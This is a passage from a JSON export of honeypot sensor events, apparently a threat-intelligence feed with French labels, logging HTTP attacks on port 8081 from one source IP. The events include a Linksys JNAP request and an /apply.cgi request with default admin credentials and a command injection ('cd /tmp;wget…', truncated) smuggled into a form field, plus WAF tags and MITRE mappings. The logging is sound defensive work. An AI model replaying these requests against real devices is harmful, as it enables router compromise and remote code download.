{\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 82}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022c2716e8dede0b691e656a8075e706620\u0022, \u0022path_pattern_hash\u0022: \u002209d793525e81db3cecc4e36c738b6310\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 82}, \u0022payload_preview\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jn\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/JNAP\/\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jnap\/setup\/SetupWizard\\r\\nContent-Length: 236\\r\\nConnection: close\\r\\n\\r\\n{\\\u0022JNAP\\\u0022:{\\\u0022action\\\u0022:\\\u0022http:\/\/linksys.com\/jnap\/setup\/SetupWizard\\\u0022,\\\u0022c\u0022, \u0022payload_snippet\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jn\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/JNAP\/\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jnap\/setup\/SetupWizard\\r\\nContent-Length: 236\\r\\nConnection: close\\r\\n\\r\\n{\\\u0022JNAP\\\u0022:{\\\u0022action\\\u0022:\\\u0022http:\/\/linksys.com\/jnap\/setup\/SetupWizard\\\u0022,\\\u0022c\u0022, \u0022payload_snippet\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jn\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u00222c8366f2e7ed770459ccd215473c6bbf5e7de0c1\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/JNAP\/\u0022, \u0022request_line\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jn\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/JNAP\/\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 82\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 82}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 82, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 8081, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Cmdi\u0022, \u0022pat-0146\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/JNAP\/\u0022, \u0022request_line\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/JNAP\/\u0022, \u0022evidence_snippet\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jn\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 10 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u00228081\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:8081","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":10,"bytes_in":428},{"id":11809668,"ip":"45.153.34.252","ts":"2026-07-14 02:29:31.000000","proto":"tcp","src_port":47812,"dst_port":8081,"service":"http","classification":"cmd_injection","waf_score":34,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/apply.cgi","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 5, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u00221994c0ff95f3f16c5fa9177d852edc4f1a4a8a24\u0022, \u0022http_target_hash\u0022: \u002231402cc48ac7ac052e1d50fc94349665a12c2c45\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 434, \u0022payload_entropy\u0022: 5.3451921822832285, \u0022port_category\u0022: \u0022registered\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 8081, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.4, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 82, \u0022tag_count\u0022: 12, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u00221c5dcf3e0abf2bbffb5e61322e8d6db5b1633b92\u0022, \u0022event_fingerprint\u0022: \u0022776ffb2a7499e20a6aef854f832a2ad0b7b0ea31\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 142, \u0022precision_signals\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0463\u0022, \u0022pat-0146\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022Cred Basic auth spray\u0022, \u0022CRS 932205\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0463\u0022, \u0022pat-0146\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 82}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u00226242fe09486565e91e4827a224745ef8\u0022, \u0022path_pattern_hash\u0022: \u0022b3e1dfd605a877958cebee595444f5d1\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 82}, \u0022payload_preview\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-url\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/apply.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 255\\r\\nConnection: close\\r\\n\\r\\naction=Apply\u0026change_action=gozila_cgi\u0026submit_type=\u0026pptp_ip=cd%20\/tmp%3Bwget%2\u0022, \u0022payload_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-url\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/apply.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 255\\r\\nConnection: close\\r\\n\\r\\naction=Apply\u0026change_action=gozila_cgi\u0026submit_type=\u0026pptp_ip=cd%20\/tmp%3Bwget%2\u0022, \u0022payload_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-url\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u00220496f7d21e5dd6cb3d51360add3111d11e7714b4\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/apply.cgi\u0022, \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-url\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/apply.cgi\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 82\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 82}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 82, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 8081, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Cmdi\u0022, \u0022pat-0146\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/apply.cgi\u0022, \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/apply.cgi\u0022, \u0022evidence_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-url\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 5 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u00228081\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_auth_header_token\u0022, \u0022http_basic_auth\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:8081","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_auth_header_token\u0022, \u0022http_basic_auth\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":10,"bytes_in":434},{"id":11809669,"ip":"45.153.34.252","ts":"2026-07-14 02:29:31.000000","proto":"tcp","src_port":47826,"dst_port":8081,"service":"http","classification":"http_smuggling_probe","waf_score":34,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/apply.cgi","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 4, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u00221994c0ff95f3f16c5fa9177d852edc4f1a4a8a24\u0022, \u0022http_target_hash\u0022: \u002231402cc48ac7ac052e1d50fc94349665a12c2c45\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 383, \u0022payload_entropy\u0022: 5.293361928821448, \u0022port_category\u0022: \u0022registered\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 8081, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.4, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 